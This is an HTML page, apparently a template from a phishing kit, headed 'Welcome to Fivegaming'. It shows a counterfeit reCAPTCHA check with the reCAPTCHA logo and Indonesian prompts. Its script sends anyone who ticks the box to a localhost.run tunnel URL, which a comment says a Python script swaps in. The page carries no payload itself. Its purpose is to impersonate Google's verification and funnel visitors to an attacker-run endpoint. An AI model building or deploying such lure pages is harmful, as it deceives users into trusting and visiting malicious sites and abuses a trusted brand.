<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome to Fivegaming</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f9f9f9;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            max-width: 400px;
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0,0,0,0.1);
            text-align: center;
        }
        .container h1 {
            color: #333;
        }
        .recaptcha-container {
            display: flex;
            align-items: center;
            justify-content: center;
            margin-top: 20px;
        }
        .recaptcha-logo {
            width: 30px;
            height: 30px;
            margin-right: 10px;
        }
        .verification-btn {
            background-color: #007bff;
            color: #fff;
            border: none;
            padding: 10px 20px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 16px;
            margin-top: 20px;
            cursor: pointer;
            border-radius: 4px;
        }
        .verification-btn:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Welcome to Fivegaming</h1>
        <p>Verifikasi untuk melanjutkan:</p>
        <div class="recaptcha-container">
            <img src="https://w7.pngwing.com/pngs/994/950/png-transparent-recaptcha-wordmark-hd-logo-thumbnail.png" class="recaptcha-logo">
            <input type="checkbox" id="verificationCheckbox">
            <label for="verificationCheckbox">I'm not a robot</label>
        </div>
        <button type="button" class="verification-btn" onclick="verify()">Verifikasi</button>
    </div>

    <script>
        var newURL = "https://29d409ab29307a.lhr.life";  // Ini akan diganti oleh skrip Python

        function verify() {
            var checkbox = document.getElementById("verificationCheckbox");
            if (checkbox.checked) {
                window.location.href = newURL;
            } else {
                alert("Mohon centang kotak verifikasi untuk melanjutkan.");
            }
        }
    </script>
</body>
</html>